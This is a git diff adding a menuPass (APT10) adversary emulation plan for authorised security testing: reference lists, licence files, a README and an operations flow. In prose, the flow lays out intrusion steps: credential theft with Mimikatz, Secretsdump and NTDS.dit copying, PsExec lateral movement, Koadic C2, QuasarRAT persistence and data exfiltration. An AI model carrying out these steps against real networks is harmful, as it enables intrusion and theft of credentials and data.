+1 |[menuPass Returns with New Malware and New Attacks Against Japanese Academics and Organizations](https://unit42.paloaltonetworks.com/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/)|[Palo Alto Networks](https://paloaltonetworks.com)| March 2017 |
+2 |[CrowdCasts Monthly: You Have an Adversary Problem](https://slideshare.net/CrowdStrike/crowd-casts-monthly-you-have-an-adversary-problem)|[CrowdStrike](https://crowdstrike.com)| March 2017|
+3 |[Poison Ivy: Assessing Damage and Extracting Intelligence](https://fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf)|[FireEye](https://fireeye.com)|November 2014|
+4 |[Operation Cloud Hopper](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf)|[PricewaterhouseCoopers](https://www.pwc.com)| April 2017|
+5 |[APT10(MenuPass Group): New Tools, Global Campaign Latest Manifestation of a Longstanding Threat](https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html)|[FireEye](https://fireeye.com)| June 2017|
+6 |[United States of America v. Zhu Hua and Zhang Shilong](https://www.justice.gov/opa/press-release/file/1121706/download)|[Department of Justice](https://www.justice.gov)| April 2019
+7 |[Operation Cloud Hopper: Technical Annex](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)|[PricewaterhouseCoopers](https://www.pwc.com)| April 2017
+8 |[HOGFISH RedLeaves Campaign](https://www.accenture.com/t20180423T055005Z_s_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf)|[Accenture](https://www.accenture.com)| July 2018
+9 |[APT10 Targeting Japanese Corporations Using Updated TTPs](https://fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html)|[FireEye](https://fireeye.com)| September 2018
+10 |[APT10 Targeted Norwegian MSP and US Companies in Sustained Campaign - Report and Annex](https://go.recordedfuture.com/hubfs/reports/cta-2019-0206.pdf)| [Recorded Future](https://recordedfuture.com)| February 2019
+11 |[Chessmaster Cyber Espionage Campaign](https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-cyber-espionage-campaign/)|[Trend Micro](https://www.trendmicro.com/en_us/business.html)| July 2017
+12 |[Intrusions Affecting Multiple Victims Accross Multiple Sectors](https://us-cert.cisa.gov/ncas/alerts/TA17-117A)|[CISA](https://us-cert.cisa.gov)| April 2017
+13 |[MenuPass/QuasarRAT Backdoor](https://blogs.blackberry.com/en/2019/06/threat-spotlight-menupass-quasarrat-backdoor)|[Blackberry](https://www.blackberry.com)| April 2017
+14 |[Two Birds, One STONE PANDA](https://crowdstrike.com/blog/two-birds-one-stone-panda/)|[CrowdStrike](https://crowdstrike.com)| April 2018
+15 |[ChessMaster's New Strategy: Evolving Tools and Tactics](http://blog.trendmicro.com/trendlabs-security-intelligence/chessmasters-new-strategy-evolving-tools-tactics/)|[Trend Micro](https://trendmicro.com/en_us/business.html)| November 2017
+16 |[ChessMaster Adds Updated Tools to Its Arsenal](https://trendmicro.com/en_us/research/18/c/chessmaster-adds-updated-tools-to-its-arsenal.html)|[Trend Micro](https://trendmicro.com/en_us/business.html)| March 2018
+17 |[APT10 was managed by the Tianjin bureau of the Chinese Ministry of State Security](https://intrusiontruth.wordpress.com/2018/08/15/apt10-was-managed-by-the-tianjin-bureau-of-the-chinese-ministry-of-state-security/)| [Intrusion Truth](https://intrusiontruth.wordpress.com)| March 2018
+18 |[RedLeaves-Malware Based on Open Source RAT](https://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html)|[JPCERT](https://jpcert.or.jp/english/)| April 2017
+19 |[Carbon Black Threat Research Dissects Red Leaves Malware, Which Leverages DLL Side Loading](https://www.carbonblack.com/blog/carbon-black-threat-research-dissects-red-leaves-malware-leverages-dll-side-loading/)|[Carbon Black](https://www.carbonblack.com)| May 2017
+20 |[Relationship between attacker group menuPass malware "Poison Ivy, PlugX, ChChes"](https://lac.co.jp/lacwatch/people/20170223_001224.html)|[LAC](https://lac.co.jp/english)| February 2017
+21 |[New attack by APT attack group menuPass (APT10) confirmed](https://lac.co.jp/lacwatch/people/20180521_001638.html)|[LAC](https://lac.co.jp/english)| May 2018
+22 |[Code Blue 2017: Pursue the Attackers](https://jpcert.or.jp/present/2018/20171109codeblue2017_en.pdf)|[JPCERT](https://jpcert.or.jp/english/)|November 2017
+23 |[Swiss Cyber Storm:Cross-Border Hunting of Sophisticated Threat Actors in Enterprise Networks - Challenges and Success Factors](https://2016.swisscyberstorm.com/res/presentations/SCS7-Mark-Barwinski.pdf)|[Swiss Cyber Storm](https://swisscyberstorm.com)| October 2016
+24 |[How Attackers are Using LNK Files to Download Malware](https://trendmicro/en_us/research/17/e/rising-trend-attackers-using-lnk-files-download-malware.html)| [Trend Micro](https://trendmicro.com/en_us/business.html)| May 2017
+25 | [Uncovering New Activity By APT10](https://fortinet.com/blog/threat-research/uncovering-new-activity-by-apt-)| [Fortinet](https://fortinet.com)| October 2019
+26 | [Operation Soft Cell: A Worldwide Campaign Against Telecommunications Providers](https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers) | [cybereason](https://www.cybereason.com)| June 2019
+27 | [TA410:The Group Behind Lookback Attacks Against U.S. Utilities Sector Returns With New Malware](https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new)| [proofpoint](https://proofpoint.com)| June 2020
+28 | [Attack Activities by Quasar Family](https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html)| [JPCERT](https://jpcert.or.jp/english/) | December 2020
+29 | [Malware Leveraging PowerSploit](https://blogs.jpcert.or.jp/en/2017/03/malware-leveraging-powersploit.html)| [JPCERT](https://jpcert.or.jp/english/)|March 2017
+30 | [ChChes - Malware that Communicates with C&C Servers Using Cookie Headers](https://blogs.jpcert.or.jp/en/2017/02/chches-malware--93d6.html)|[JPCERT](https://jpcert.or.jp/english/)|February 2017
+31 | [How Attackers are Using LNK Files to Download Malware](https://trendmicro.com/en_us/research/17/e/rising-trend-attackers-using-lnk-files-download-malware.html)|[Trend Micro](https://trendmicro.com/en_us/business.html)| May 2017
+32 | [Japan-Linked Organizations Targeted in Long-Running and Sophisticated Attack Campaign](https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage)|[Symantec](https://broadcom.com/)| November 2020
+
+---
+
+## Additional Plan Resources
+
+- [Intelligence Summary](/menuPass/Intelligence_Summary.md)
+- [Operations Flow](/menuPass/Operations_Flow.md)
+- [Emulation Plan](/menuPass/Emulation_Plan/README.md)
+  - [Resource Development](/menuPass/Emulation_Plan/ResourceDevelopment.md)
+  - [Infrastructure](/menuPass/Emulation_Plan/Infrastructure.md)
+  - [Scenario 1](/menuPass/Emulation_Plan/Scenario1.md)
+  - [Scenario 2](/menuPass/Emulation_Plan/Scenario2.md)
+  - [YAML](/menuPass/Emulation_Plan/yaml)
+- [Issues](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/issues)
+- [Change Log](/menuPass/CHANGE_LOG.md)
diff --git a/menuPass/LICENSE b/menuPass/LICENSE
new file mode 100644
index 00000000..261eeb9e
--- /dev/null
+++ b/menuPass/LICENSE
@@ -0,0 +1,201 @@
+                                 Apache License
+                           Version 2.0, January 2004
+                        http://www.apache.org/licenses/
+
+   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
+
+   1. Definitions.
+
+      "License" shall mean the terms and conditions for use, reproduction,
+      and distribution as defined by Sections 1 through 9 of this document.
+
+      "Licensor" shall mean the copyright owner or entity authorized by
+      the copyright owner that is granting the License.
+
+      "Legal Entity" shall mean the union of the acting entity and all
+      other entities that control, are controlled by, or are under common
+      control with that entity. For the purposes of this definition,
+      "control" means (i) the power, direct or indirect, to cause the
+      direction or management of such entity, whether by contract or
+      otherwise, or (ii) ownership of fifty percent (50%) or more of the
+      outstanding shares, or (iii) beneficial ownership of such entity.
+
+      "You" (or "Your") shall mean an individual or Legal Entity
+      exercising permissions granted by this License.
+
+      "Source" form shall mean the preferred form for making modifications,
+      including but not limited to software source code, documentation
+      source, and configuration files.
+
+      "Object" form shall mean any form resulting from mechanical
+      transformation or translation of a Source form, including but
+      not limited to compiled object code, generated documentation,
+      and conversions to other media types.
+
+      "Work" shall mean the work of authorship, whether in Source or
+      Object form, made available under the License, as indicated by a
+      copyright notice that is included in or attached to the work
+      (an example is provided in the Appendix below).
+
+      "Derivative Works" shall mean any work, whether in Source or Object
+      form, that is based on (or derived from) the Work and for which the
+      editorial revisions, annotations, elaborations, or other modifications
+      represent, as a whole, an original work of authorship. For the purposes
+      of this License, Derivative Works shall not include works that remain
+      separable from, or merely link (or bind by name) to the interfaces of,
+      the Work and Derivative Works thereof.
+
+      "Contribution" shall mean any work of authorship, including
+      the original version of the Work and any modifications or additions
+      to that Work or Derivative Works thereof, that is intentionally
+      submitted to Licensor for inclusion in the Work by the copyright owner
+      or by an individual or Legal Entity authorized to submit on behalf of
+      the copyright owner. For the purposes of this definition, "submitted"
+      means any form of electronic, verbal, or written communication sent
+      to the Licensor or its representatives, including but not limited to
+      communication on electronic mailing lists, source code control systems,
+      and issue tracking systems that are managed by, or on behalf of, the
+      Licensor for the purpose of discussing and improving the Work, but
+      excluding communication that is conspicuously marked or otherwise
+      designated in writing by the copyright owner as "Not a Contribution."
+
+      "Contributor" shall mean Licensor and any individual or Legal Entity
+      on behalf of whom a Contribution has been received by Licensor and
+      subsequently incorporated within the Work.
+
+   2. Grant of Copyright License. Subject to the terms and conditions of
+      this License, each Contributor hereby grants to You a perpetual,
+      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+      copyright license to reproduce, prepare Derivative Works of,
+      publicly display, publicly perform, sublicense, and distribute the
+      Work and such Derivative Works in Source or Object form.
+
+   3. Grant of Patent License. Subject to the terms and conditions of
+      this License, each Contributor hereby grants to You a perpetual,
+      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+      (except as stated in this section) patent license to make, have made,
+      use, offer to sell, sell, import, and otherwise transfer the Work,
+      where such license applies only to those patent claims licensable
+      by such Contributor that are necessarily infringed by their
+      Contribution(s) alone or by combination of their Contribution(s)
+      with the Work to which such Contribution(s) was submitted. If You
+      institute patent litigation against any entity (including a
+      cross-claim or counterclaim in a lawsuit) alleging that the Work
+      or a Contribution incorporated within the Work constitutes direct
+      or contributory patent infringement, then any patent licenses
+      granted to You under this License for that Work shall terminate
+      as of the date such litigation is filed.
+
+   4. Redistribution. You may reproduce and distribute copies of the
+      Work or Derivative Works thereof in any medium, with or without
+      modifications, and in Source or Object form, provided that You
+      meet the following conditions:
+
+      (a) You must give any other recipients of the Work or
+          Derivative Works a copy of this License; and
+
+      (b) You must cause any modified files to carry prominent notices
+          stating that You changed the files; and
+
+      (c) You must retain, in the Source form of any Derivative Works
+          that You distribute, all copyright, patent, trademark, and
+          attribution notices from the Source form of the Work,
+          excluding those notices that do not pertain to any part of
+          the Derivative Works; and
+
+      (d) If the Work includes a "NOTICE" text file as part of its
+          distribution, then any Derivative Works that You distribute must
+          include a readable copy of the attribution notices contained
+          within such NOTICE file, excluding those notices that do not
+          pertain to any part of the Derivative Works, in at least one
+          of the following places: within a NOTICE text file distributed
+          as part of the Derivative Works; within the Source form or
+          documentation, if provided along with the Derivative Works; or,
+          within a display generated by the Derivative Works, if and
+          wherever such third-party notices normally appear. The contents
+          of the NOTICE file are for informational purposes only and
+          do not modify the License. You may add Your own attribution
+          notices within Derivative Works that You distribute, alongside
+          or as an addendum to the NOTICE text from the Work, provided
+          that such additional attribution notices cannot be construed
+          as modifying the License.
+
+      You may add Your own copyright statement to Your modifications and
+      may provide additional or different license terms and conditions
+      for use, reproduction, or distribution of Your modifications, or
+      for any such Derivative Works as a whole, provided Your use,
+      reproduction, and distribution of the Work otherwise complies with
+      the conditions stated in this License.
+
+   5. Submission of Contributions. Unless You explicitly state otherwise,
+      any Contribution intentionally submitted for inclusion in the Work
+      by You to the Licensor shall be under the terms and conditions of
+      this License, without any additional terms or conditions.
+      Notwithstanding the above, nothing herein shall supersede or modify
+      the terms of any separate license agreement you may have executed
+      with Licensor regarding such Contributions.
+
+   6. Trademarks. This License does not grant permission to use the trade
+      names, trademarks, service marks, or product names of the Licensor,
+      except as required for reasonable and customary use in describing the
+      origin of the Work and reproducing the content of the NOTICE file.
+
+   7. Disclaimer of Warranty. Unless required by applicable law or
+      agreed to in writing, Licensor provides the Work (and each
+      Contributor provides its Contributions) on an "AS IS" BASIS,
+      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
+      implied, including, without limitation, any warranties or conditions
+      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
+      PARTICULAR PURPOSE. You are solely responsible for determining the
+      appropriateness of using or redistributing the Work and assume any
+      risks associated with Your exercise of permissions under this License.
+
+   8. Limitation of Liability. In no event and under no legal theory,
+      whether in tort (including negligence), contract, or otherwise,
+      unless required by applicable law (such as deliberate and grossly
+      negligent acts) or agreed to in writing, shall any Contributor be
+      liable to You for damages, including any direct, indirect, special,
+      incidental, or consequential damages of any character arising as a
+      result of this License or out of the use or inability to use the
+      Work (including but not limited to damages for loss of goodwill,
+      work stoppage, computer failure or malfunction, or any and all
+      other commercial damages or losses), even if such Contributor
+      has been advised of the possibility of such damages.
+
+   9. Accepting Warranty or Additional Liability. While redistributing
+      the Work or Derivative Works thereof, You may choose to offer,
+      and charge a fee for, acceptance of support, warranty, indemnity,
+      or other liability obligations and/or rights consistent with this
+      License. However, in accepting such obligations, You may act only
+      on Your own behalf and on Your sole responsibility, not on behalf
+      of any other Contributor, and only if You agree to indemnify,
+      defend, and hold each Contributor harmless for any liability
+      incurred by, or claims asserted against, such Contributor by reason
+      of your accepting any such warranty or additional liability.
+
+   END OF TERMS AND CONDITIONS
+
+   APPENDIX: How to apply the Apache License to your work.
+
+      To apply the Apache License to your work, attach the following
+      boilerplate notice, with the fields enclosed by brackets "[]"
+      replaced with your own identifying information. (Don't include
+      the brackets!)  The text should be enclosed in the appropriate
+      comment syntax for the file format. We also recommend that a
+      file or class name and description of purpose be included on the
+      same "printed page" as the copyright notice for easier
+      identification within third-party archives.
+
+   Copyright [yyyy] [name of copyright owner]
+
+   Licensed under the Apache License, Version 2.0 (the "License");
+   you may not use this file except in compliance with the License.
+   You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+   Unless required by applicable law or agreed to in writing, software
+   distributed under the License is distributed on an "AS IS" BASIS,
+   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+   See the License for the specific language governing permissions and
+   limitations under the License.
diff --git a/menuPass/NOTICE.txt b/menuPass/NOTICE.txt
new file mode 100644
index 00000000..3d050742
--- /dev/null
+++ b/menuPass/NOTICE.txt
@@ -0,0 +1,16 @@
+Copyright 2021 MITRE Engenuity. Approved for public release. Document number CT0012.
+
+Licensed under the Apache License, Version 2.0 (the "License");
+you may not use this file except in compliance with the License.
+You may obtain a copy of the License at
+
+   http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+See the License for the specific language governing permissions and
+limitations under the License.
+
+This project makes use of ATT&CK®
+ATT&CK Terms of Use — https://attack.mitre.org/resources/terms-of-use/
diff --git a/menuPass/Operations_Flow.md b/menuPass/Operations_Flow.md
new file mode 100644
index 00000000..5dfdaa2d
--- /dev/null
+++ b/menuPass/Operations_Flow.md
@@ -0,0 +1,101 @@
+# menuPass Operations Flow
+
+Please see the formal [menuPass Intelligence Summary](/menuPass/Intelligence_Summary.md) which includes a break-down of the cited intelligence used for each step of this emulation.  The menuPass emulation is split into two distinct Scenarios, [Scenario 1](/menuPass/Emulation_Plan/Scenario1.md) and [Scenario 2](/menuPass/Emulation_Plan/Scenario2.md).
+
+---
+
+![/menuPass/Emulation_Plan/OpFlow_Diagram.png](/menuPass/Emulation_Plan/OpFlow_Diagram.png)
+
+---
+
+# Reconnaissance and Resource Development
+
+Due to the wealth of publicly available information in this regard, reconnaissance and resource development considerations have been summarized.  While not necessary, if you have the resources to emulate this activity and intend to do so while remaining operationally representative, the information provided may be beneficial.  Information gathering, capability development, weaponization, and infrastructure are discussed at a high level to give context to the emulation and serve as a reference for the emulation team.
+
+# Scenario 1
+
+Scenario 1 prescribes TTPs similar to those attributed to menuPass specific to the group's efforts targeting MSP subscriber networks.
+
+menuPass is reported to have compromised MSP networks with the intent of abusing trust relationships to pivot into subscriber networks.<sup>[4](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf)</sup> <sup>[5](https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html)</sup> <sup>[6](https://www.justice.gov/opa/press-release/file/1121706/download)</sup> <sup>[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)</sup> <sup>[10](https://recordedfuture.com/apt10-cyberespionage-campaign/)</sup> <sup>[12](https://us-cert.cisa.gov/ncas/alerts/TA17-117A)</sup>  The attackers traversed MSP networks in search of shared infrastructure.  This infrastructure was compromised and used as a pivot point into the subscriber network.  menuPass is commonly reported to have accessed subscriber networks with legitimate but compromised MSP or subscriber domain credentials.<sup>[4](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf)</sup> <sup>[5](https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html)</sup> <sup>[6](https://www.justice.gov/opa/press-release/file/1121706/download)</sup> <sup>[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)</sup> <sup>[10](https://recordedfuture.com/apt10-cyberespionage-campaign/)</sup> <sup>[12](https://us-cert.cisa.gov/ncas/alerts/TA17-117A)</sup>
+
+## Initial Access
+To emulate initial access, you may elect to assess the feasibility of trusted relationship abuse by enumerating shared infrastructure and services that could serve as a foothold into your networks.
+
+You may also assume breach by providing the emulation team with a VPN/RDP connection.  menuPass is reported to have initially accessed MSP subscriber networks with elevated permissions, so too should the emulation team.<sup>[4](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf)</sup> <sup>[5](https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html)</sup> <sup>[6](https://www.justice.gov/opa/press-release/file/1121706/download)</sup> <sup>[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)</sup> <sup>[10](https://recordedfuture.com/apt10-cyberespionage-campaign/)</sup> <sup>[12](https://us-cert.cisa.gov/ncas/alerts/TA17-117A)</sup>  The intent of this scenario is to assess your organization's ability to protect, detect, and defend against execution, tool ingress, discovery, credential access, lateral movement, persistence, collection, and exfiltration and thereby encourage defense in depth.  The YAML file does not address initial access.  This procedure is left to the discretion of the emulation team.
+
+## Tool Ingress
+
+After establishing a point of presence on the target network, menuPass actors are commonly reported to have introduced an operational toolkit from attacker controlled infrastructure.  This operational toolkit enables the attackers to pursue operational objectives and will enable the emulation team to pursue the subsequent steps in this scenario.
+
+## Discovery
+
+Once the operational toolkit has been introduced to the operating environment, the emulation team will conduct discovery with the intent of identifying opportunities while attempting to blend in with routine administrative tasks.  The emulation team should enumerate the network and Active Directory (AD) with the intent of identifying opportunities for credential access and lateral movement.  This is also the time to begin searching for systems of interest and identifying approaches to these systems.
+
+## Credential Access
+
+This objective should be pursued in parallel with discovery.<sup>[4](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf)</sup>  Reporting suggests that the credentials used by menuPass to pivot into target networks provided elevated permissions.  Other reporting details menuPass's use of exploits to achieve initial access.  Some of these exploits may have resulted in code execution in an elevated context.  In either case, the need for privilege escalation has been satisfied and the actors may instead, be interested in pursuing credential access in order to ensure freedom of movement throughout the domain.<sup>[4](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf)</sup>  menuPass actors are thought to have compromised additional credentials using publicly available tools like Mimikatz and Secretsdump.<sup>[4](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf)</sup>
+
+## Lateral Movement
+
+After performing discovery and compromising additional credentials, the emulation team should attempt lateral movement to systems of interest using tools indicative of routine administrative tasks.
+
+menuPass is reported to have accessed remote systems by mounting remote network shares, using RDP to console into remote machines, and by using tools like PsExec to achieve remote code execution.  menuPass actors are reported to have used these techniques to deploy their sustained malware to remote systems and subsequently establish C2.<sup>[4](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf)</sup>  After C2 was established with the system of interest, menuPass actors are reported to have confirmed network connectivity and conducted situational awareness checks.
+
+## Collection and Staging
+
+After successfully establishing a point of presence on the remote system of interest, menuPass actors are then reported to have browsed the file system in search of information.  This information was subsequently compressed and staged for exfiltration, often in the Recycle Bin.<sup>[4](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf)</sup>
+
+## Exfiltration
+
+The compressed archives are then reported to have been exfiltrated from the victim network by mounting a remote network share and copying the files out of the network or by using tools like Putty and/or Robocopy to transfer the data.<sup>[4](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf)</sup>
+
+---
+
+# Scenario 2
+
+Scenario 2 prescribes TTPs publicly attributed to menuPass that entail the pursuit of operational objectives using a command-and-control framework.  This scenario is intended to assess your organization's ability to protect, detect, and defend to execution, discovery, privilege escalation, credential access, lateral movement, exfiltration, command and control, and persistence using a C2 framework.  Amongst other tactical implants, menuPass is reported to have used Koadic C3.  This publicly available C2 framework relies on Windows Scripting Host to conduct most of its operations.  This tool will be used to pursue tactical objectives with the operational objective of exfiltrating/simulating exfiltration.
+
+## Initial Access
+
+menuPass is reported to have deployed tactical implants by spearphishing.  Spearphishing emails attributed to menuPass typically featured a weaponized attachment that when opened, would exploit a vulnerability, direct the recipient to run an embedded macro, or click a link to download and execute a file.  Each of these vectors were responsible for deploying menuPass malware and establishing command and control.<sup>[4](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf)</sup>
+
+## Execution
+
+If you have the resources to dedicate to emulating a phishing campaign, please do so.  We have suggested an execution event that situates a tactical implant (Koadic C3) in memory and establishes C2.  This implant will be used to accomplish the subsequent steps in this scenario.
+
+## Discovery
+
+After establishing C2, menuPass actors are reported to have conducted situational awareness checks by accessing the Windows command-line.  You may also elect to conduct discovery with the intent of identifying systems of interest, staging points, and viable points of persistence.
+
+## Privilege Escalation
+
+In the event that the assessing team is unable to escalate privileges, this event can be “white-carded” with the granting of administrative rights to the compromised account.  This white-carded event could enable the assessing team to escalate via credential access, as most of the credential access procedures described hereafter require elevated privileges.  You may also elect to use Koadic's "elevate" modules to achieve execution in an elevated context.
+
+## Credential Access
+
+Much like Scenario 1, we will seek to access additional credentials to ensure freedom of movement.  This step differs from credential access in Scenario 1 as we will be using our tactical implant to achieve credential access.
+
+In some instances, menuPass actors are reported to have copied and exfiltrated the Active Directory database file (NTDS.dit). This level of credential access ensures freedom of movement throughout the domain.
+
+## Lateral Movement and Exfiltration
+
+The credentials used in the previous step will be coupled with modules native to Koadic to move laterally to systems of interest and conduct exfiltration/simulate exfiltration.
+
+## C2 and Persistence
+
+menuPass is reported to have deployed sustained malware to strategic systems within the compromised environment to ensure long-term persistent access to the network.<sup>[4](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf)</sup> <sup>[5](https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html)</sup> <sup>[6](https://www.justice.gov/opa/press-release/file/1121706/download)</sup> <sup>[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)</sup> <sup>[10](https://recordedfuture.com/apt10-cyberespionage-campaign/)</sup> <sup>[12](https://us-cert.cisa.gov/ncas/alerts/TA17-117A)</sup>  In this step, we use Koadic and/or the Windows command-line to ingress sustained malware.  menuPass is widely reported to have used the publicly available QuasarRat.
+
+---
+
+## Additional Plan Resources
+
+- [Intelligence Summary](/menuPass/Intelligence_Summary.md)
+- [Operations Flow](/menuPass/Operations_Flow.md)
+- [Emulation Plan](/menuPass/Emulation_Plan/README.md)
+  - [Resource Development](/menuPass/Emulation_Plan/ResourceDevelopment.md)
+  - [Infrastructure](/menuPass/Emulation_Plan/Infrastructure.md)
+  - [Scenario 1](/menuPass/Emulation_Plan/Scenario1.md)
+  - [Scenario 2](/menuPass/Emulation_Plan/Scenario2.md)
+  - [YAML](/menuPass/Emulation_Plan/yaml)
+- [Issues](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/issues)
+- [Change Log](/menuPass/CHANGE_LOG.md)
diff --git a/menuPass/README.md b/menuPass/README.md
new file mode 100644
index 00000000..5b261a0c
--- /dev/null
+++ b/menuPass/README.md
@@ -0,0 +1,43 @@
+# menuPass Adversary Emulation
+
+menuPass is thought to be motivated by collection objectives that align with Chinese national interests. The group's targeting is consistent with China's strategic objectives as stated in the Five-Year Plan (FYP) / Made in China 2025 Plan. While most of the group's targets have been located in the United States and Japan, the group has also been linked to intrusions in at least 12 other countries.
+
+The Intelligence Summary summarizes 32 publicly available sources to describe menuPass, their motivations, objectives, and observed target industries. It further describes the typical menuPass Operational Flow along with their publicly attributed Tactics, Techniques, and Procedures (TTPs) mapped to ATT&CK. In reviewing the plan, you may notice TTPs that do not currently map to the ATT&CK framework's menuPass group profile. This information has been provided to the ATT&CK team for analysis and potential incorporation.
+
+The Operations Flow chains techniques together into a logical flow of the major Steps that commonly occur across menuPass operations. At a macro level, the publicly available reporting attributed to menuPass can be organized into two categories.  One being reporting specific to menuPass activities directed against MSP subscriber networks.  The other being activity that generally was initiated by spearphishing and leveraged a command-and-control framework to achieve operational objectives.  Thus, we have organized the menuPass emulation plan into two scenarios.
+
+- Scenario 1: This scenario is designed to emulate activity attributed to menuPass that is specific to the group's efforts targeting MSP subscriber networks.  The intent of this scenario is to assess your organization's ability to protect, detect, and defend execution, tool ingress, discovery, credential access, lateral movement, persistence, collection, and exfiltration.
+- Scenario 2: This scenario is designed to emulate activity attributed to menuPass that entails the pursuit of operational objectives using a command-and-control framework. This scenario is intended to assess your organization's ability to protect, detect, and defend execution, discovery, privilege escalation, credential access, lateral movement, exfiltration, C2, and persistence using a command-and-control framework.
+
+The menuPass emulation plan is a human-readable, step-by-step / command-by-command implementation of menuPass TTPs. Structurally, the plan is organized into 2 scenarios, as defined in the Operations Flow. The human-readable plan is accompanied by a machine-readable plan implemented in YAML. The YAML includes all steps, commands, and syntax for Scenario 1. The YAML template was nuanced to ensure that each step within the YAML is directly coupled with its equivalent in the human-readable version.
+
+## Table of Contents
+
+- [Intelligence Summary](/menuPass/Intelligence_Summary.md)
+- [Operations Flow](/menuPass/Operations_Flow.md)
+- [Emulation Plan](/menuPass/Emulation_Plan/README.md)
+  - [Resource Development](/menuPass/Emulation_Plan/ResourceDevelopment.md)
+  - [Infrastructure](/menuPass/Emulation_Plan/Infrastructure.md)
+  - [Scenario 1](/menuPass/Emulation_Plan/Scenario1.md)
+  - [Scenario 2](/menuPass/Emulation_Plan/Scenario2.md)
+  - [YAML](/menuPass/Emulation_Plan/yaml)
+- [Issues](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/issues)
+- [Change Log](/menuPass/CHANGE_LOG.md)
+
+## Liability / Responsible Usage
+
+This content is only to be used with appropriate prior, explicit authorization for the purposes of assessing security posture and/or research.
+
+## Notice
+
+Copyright 2021 MITRE Engenuity. Approved for public release. Document number CT0012.
+
+Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at
+
+[http://www.apache.org/licenses/LICENSE-2.0](http://www.apache.org/licenses/LICENSE-2.0)
+
+Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
+
+This project makes use of ATT&CK®
+
+[ATT&CK Terms of Use](https://attack.mitre.org/resources/terms-of-use/)
diff --git a/resources/README.md b/resources/README.md
index 731eec1b..fb99cfe8 100644
--- a/resources/README.md
+++ b/resources/README.md
@@ -2,7 +2,7 @@
 
 This folder contains additional resources that may be utilized in conjunction with emulation plans in the [Adversary Emulation Library](/README.md). Each component is summarized below.
 
-### JSON Schema 
+### JSON Schema
 
 Schema used to validate Adversary Emulation Plan YAML files (e.g. [fin6.yaml](/fin6/Emulation_Plan/FIN6.yaml ))
 
diff --git a/emulation_plan_structure.md b/structure/emulation_plan_structure.md
similarity index 77%
rename from emulation_plan_structure.md
rename to structure/emulation_plan_structure.md
index ca6bbd05..de53c823 100644
--- a/emulation_plan_structure.md
+++ b/structure/emulation_plan_structure.md
@@ -8,18 +8,18 @@ Each emulation plan is built based on the same structural components:
 
 The following notional operations flow diagram outlines this structure:
 
-![](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/structural-documentation/notional_diagram.PNG)
+![/structure/notional_diagram.PNG](/structure/notional_diagram.PNG)
 
 ## Additional Considerations
 
 Each operations flow is designed based on what scenario(s) are being captured in the emulation from the cyber threat intelligence describing the target adversary's operational activity. Thusly, operational flows will be sequential but not always   linear.
 
-![](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/structural-documentation/notional_diagram_loops.PNG)
+![/structure/notional_diagram.PNG](/structure/notional_diagram_loops.PNG)
 
 In this case, there is a loop between the third and fifth Steps (*Maintain Access* through *Pivot to New Victim*) before reaching the last Step in the Scenario.
 
 We have also defined an additional, optional component of a **Phase** to capture groupings of Steps that can be interchanged.
 
